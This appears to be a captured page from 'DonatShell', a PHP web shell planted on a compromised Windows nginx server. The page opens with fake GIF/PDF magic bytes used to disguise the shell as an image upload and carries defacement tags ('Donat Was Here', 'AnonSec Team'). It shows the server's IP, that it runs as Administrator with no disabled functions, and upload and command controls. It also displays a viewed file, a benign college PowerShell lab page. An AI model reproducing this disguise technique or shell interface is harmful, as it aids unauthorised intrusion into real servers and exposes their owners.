GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST1861/Labs/Lab04/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST1861/Labs/Lab04/Lab04.phpinc
<?
// JimMartinson/CST1861/Labs/Lab04/index.php

require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.

$disabled = '';
$disabled = ' disabled'; // Comment this line to enable lab.
#if ( $_SESSION['userId'] == 1 ) { $disabled = ''; }

$uploadFilename = $saveFilename.'.txt';

if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? }

?>

<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend>
The purpose of this lab is to update the Powershell 7 help system.
<br><?=$gradeNote?>
<ol>
	<li>Create a directory called <b class="copyText"><?=$evaluationName?></b>. We will use it for all work performed in this lab.</li>
	<li>Open a Windows Powershell terminal as Administrator.</li>
	<li>Update the help system.</li>
	<li>Fix the issue with PSReadLine. (review the recording to see how I did it)</li>
	<li>Force another update of the help system.</li>
	<li>Copy the output into a text editor and save it as <b class="copyText"><?=$uploadFilename?></b> in your <b><?=$evaluationName?></b> folder.
		<br>
		<div id="show_page" class="inline"><a href="#" onClick="divHide('show_page'); divShow('hide_page'); return false;">See an example:</a><br></div>
		<div id="hide_page" class="hidden"><a href="#" onClick="divHide('hide_page'); divShowInline('show_page'); return false;">Hide the example.</a>
			<div class="kbd">
				PS C:\Users\jim> <span class="psCmd">Update-Help</span> <span class="psAtt">-Force</span>
				<br><span class="psErr">Update-Help: Failed to update Help for the module(s) 'ConfigDefenderPerformance' with UI culture(s) {en-US} : One or more errors occurred. (Response status code does not indicate success: 404 (Not Found).). English-US help content is available and can be installed using: Update-Help -UICulture en-US.</span>
				<br>PS C:\Users\jim>
			</div>
			or
			<div class="kbd">
				PS C:\Users\jim> <span class="psCmd">Update-Help</span> <span class="psAtt">-Force</span>
				<br><span class="psErr">Update-Help: Failed to update Help for the module(s) 'ConfigDefender, ConfigDefenderPerformance' with UI culture(s) {en-US} : One or more errors occurred. (Response status code does not indicate success: 404 (Not Found).). English-US help content is available and can be installed using: Update-Help -UICulture en-US.</span>
				<br>PS C:\Users\jim>
			</div>
		</div>
		<span class="note normal">You should be able to review the recording and fix the issue with PSReadLine.
You should only see ConfigDefenderPerformance as module that had errors.
You have have additional help modules that did not update. Don't worry, we will talk about them next week - as long at you did fix PSReadLine.</span>
	</li>
	<li>Turn in your assignment:
		<ol type="a">
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"> for grading.</li>
		</ol>
  </li>
</ol>
<?=$gradeNote?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team